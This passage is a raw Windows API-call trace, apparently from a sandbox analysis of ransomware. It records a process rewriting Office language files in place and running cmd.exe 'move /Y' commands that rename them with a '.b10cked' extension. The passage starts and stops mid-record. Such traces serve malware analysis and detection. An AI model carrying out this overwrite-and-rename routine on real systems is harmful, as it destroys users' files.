lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x308, dwThreadId=0x7b8)) returned 1 [0167.284] CloseHandle (hObject=0x1b4) returned 1 [0167.284] CloseHandle (hObject=0x114) returned 1 [0167.284] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.284] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.284] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0167.284] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.284] ReleaseMutex (hMutex=0xf8) returned 1 [0167.285] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.285] ReleaseMutex (hMutex=0xf8) returned 1 [0167.285] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.285] ReleaseMutex (hMutex=0xf8) returned 1 [0167.285] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.285] ReleaseMutex (hMutex=0xf8) returned 1 [0167.285] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0167.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.285] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22407446085) returned 1 [0167.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16f60 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.287] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.287] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.287] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.287] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.287] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16f60 [0167.287] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.287] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x16a78 [0167.287] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16f60 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16f60 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.314] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xb7af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xb7af, lpOverlapped=0x0) returned 1 [0167.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.327] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xb7af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xb7af, lpOverlapped=0x0) returned 1 [0167.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=-47023, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb7b1 [0167.327] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xb7af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xb7af, lpOverlapped=0x0) returned 1 [0167.329] SetFilePointer (in: hFile=0x114, lDistanceToMove=-47023, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb7b1 [0167.330] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xb7af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xb7af, lpOverlapped=0x0) returned 1 [0167.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0167.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0167.336] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16f60 [0167.336] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0167.336] CloseHandle (hObject=0x114) returned 1 [0167.338] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX") returned 0x3c [0167.339] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0167.339] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x7dc, dwThreadId=0x930)) returned 1 [0167.458] CloseHandle (hObject=0x1b4) returned 1 [0167.458] CloseHandle (hObject=0x114) returned 1 [0167.459] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.459] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.459] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0167.459] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.459] ReleaseMutex (hMutex=0xf8) returned 1 [0167.459] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.459] ReleaseMutex (hMutex=0xf8) returned 1 [0167.459] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.459] ReleaseMutex (hMutex=0xf8) returned 1 [0167.459] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.459] ReleaseMutex (hMutex=0xf8) returned 1 [0167.459] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0167.459] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.459] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.459] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.459] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22424872183) returned 1 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.460] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b2560 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.461] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2b2078 [0167.461] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0167.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0167.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2b2560 [0167.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0167.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2b2560 [0167.475] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.475] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.475] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.484] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.485] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.488] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 